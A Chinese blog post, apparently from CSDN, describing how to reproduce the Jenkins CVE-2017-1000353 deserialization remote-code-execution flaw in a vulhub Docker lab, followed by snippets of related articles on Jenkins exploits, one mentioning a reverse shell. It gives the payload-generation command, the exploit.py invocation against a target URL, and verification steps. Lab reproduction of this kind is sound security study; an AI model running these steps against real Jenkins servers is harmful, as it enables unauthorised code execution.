[CVE-2017-1000353]Jenkins-CI 远程代码执行漏洞

最新推荐文章于 2024-07-16 20:41:04 发布
最新推荐文章于 2024-07-16 20:41:04 发布
阅读量489 收藏
点赞数 1
分类专栏: 漏洞利用 文章标签: 漏洞利用
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/101109161
版权

vulhub环境搭建:

cd /root/vulhub/jenkins/CVE-2017-1000353
docker-compose up -d

访问网址

http://120.79.66.58:8080/

漏洞复现:

1、先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar来生成相应利用的poc

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/CVE-2017-1000353_is_success"

生成的序列化字符串 jenkins_poc.ser

2、发送数据包,执行命令

漏洞利用脚本文件:https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

注意:上面脚本利用的时候 把proxies注释掉
在这里插入图片描述

python exploit.py http://120.79.66.58:8080 jenkins_poc.ser

在这里插入图片描述

再查看自己的目录发现漏洞执行成功

docker exec -it cve-2017-1000353_jenkins_1 /bin/bash
ls /tmp

在这里插入图片描述

小鱼儿waha
关注
专栏目录
Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353
墨痕诉清风的博客
11-06 841
(https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar),这是生成POC的工具。下载[exploit.py](https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py)参考阅读 https://blogs.securiteam.com/index.php/archives/3171。.
漏洞复现—Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 759
Jenkins反序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现—CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。   形成漏洞的根源在于类ObjectInputStream在反序列
[高危] Jenkins CLI 任意文件读取漏洞导致远程代码执行风险
weixin_43564241的博客
01-26 1140
Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容,攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合 Resource Root URL、Remember me cookie、存储型 XSS 或 CSRF 等。Jenkins 2.442, LTS 2.426.3 版本通过禁用命令解析器读取 @ 字符后文件路径的特性修复此漏洞
jenkins 执行远程linux命令
08-15
jenkins 执行远程linux命令,jenkins 执行远程linux命令,jenkins 执行远程linux命令
CVE-2017-1000353 Jenkins 漏洞复现
最新发布
weixin_60864619的博客
07-16 390
进入容器docker exec -it cve-2017-1000353_jenkins_1 bash。复现Vulhub/jenkins / CVE-2017-1000353漏洞。3)通过工具exploit.py发送数据包执行命令;监听端口8888,执行命令,反弹shell成功;2)利用工具生成字节码文件;
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
EC_Carrot的博客
07-05 205
漏洞复现 先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar 执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 下载exploit.py,python3执行python exploit.py http://your-ip:8080 jenkins_poc.ser,将刚才生成的字节码文件发送给目标 返回查看容器 ...
漏洞复现】Jenkins-CI远程代码执行漏洞(CVE-2017-1000353
weixin_43486390的博客
12-18 932
0x01 漏洞描述 Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。 0x02 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1
Jenkins远程命令执行漏洞(CVE-2018-1000861)
玄道的网安博客
06-06 5575
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
trivy:适用于CI的简单,全面的容器漏洞扫描程序
02-04
适用于CI的用于容器和其他工件的简单而全面的漏洞扫描程序。 目录 抽象 Trivy ( tri发音类似于tri gger, vy发音类似于en vy )是一种用于容器和其他工件的简单而全面的漏洞扫描程序。 软件漏洞是软件或操作系统中存在的故障,缺陷或弱点。 Trivy检测OS软件包(Alpine,RHEL,CentOS等)的漏洞和应用程序依赖项(捆绑程序,Composer,npm,yarn等)。 Trivy易于使用。 只需安装二进制文件即可开始扫描。 扫描所需要做的就是指定一个目标,例如容器的图像名称。 它被认为用于CI。 在推送到容器注册表或部署应用程序之前,您可以轻松扫描本地容器映像和其
代码层面分析Jenkins未授权访问CVE-2017-1000353
stopys6的博客
09-13 230
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
Jenkins远程命令执行漏洞CVE-2018-1000861)
qq_62056583的博客
07-10 344
通过更新中心中的1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码漏洞利用不需要任何的权限。它可以独立运行多种进程、多个应用,更加充分地发挥基础设施的作用,同时保持各个独立系统的安全性。使用docker exec -it ID bin/bash进入目录中进行查看,可以看到成功注入,漏洞复现成功。使用docker技术搭建漏洞环境,在实验环境中复现该漏洞。IP地址:192.168.32.135。
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 566
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
Jenkins远程代码执行漏洞检查(CVE-2017-1000353
weixin_30675247的博客
05-05 240
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码漏洞利用不需要任何的权限 漏洞影响范围: 所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 测试步骤: 1.下载生成反序列的payload: https://github.com/nobleXu/jenkins 2.生成...
利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞CVE-2018-1000861)
JiangBuLiu的博客
07-11 4498
Jenkins远程命令执行漏洞CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/ 漏洞原理 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...
Jenkins升级-- 无条件远程代码执行高危漏洞
skypig555的专栏
03-14 819
起因 早上收到阿里云的安全中心的电话,说检测到我们部分服务器使用了Jenkins,存在严重的安全漏洞。希望我们购买他们的安全防火墙,或者自己升级Jenkins。购买当然是不可能的拉。马上开始Jenkins升级。 硬货 停止之前的老版本 既然有漏洞,就先把老的版本服务停了。 安装新版本 这边我用的是docker-compose进行安装。docker和docker-compose的安装,自行百度。 v...
Struts2重大漏洞CVE-2017-5638:远程代码执行风险
漏洞的关键在于远程代码执行功能,黑客可以利用这个漏洞在受害服务器上通过浏览器执行任意系统命令,从而导致一系列严重安全问题。 漏洞分析深入到了Struts2的filter机制,特别是对文件类型表单的处理过程。当用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值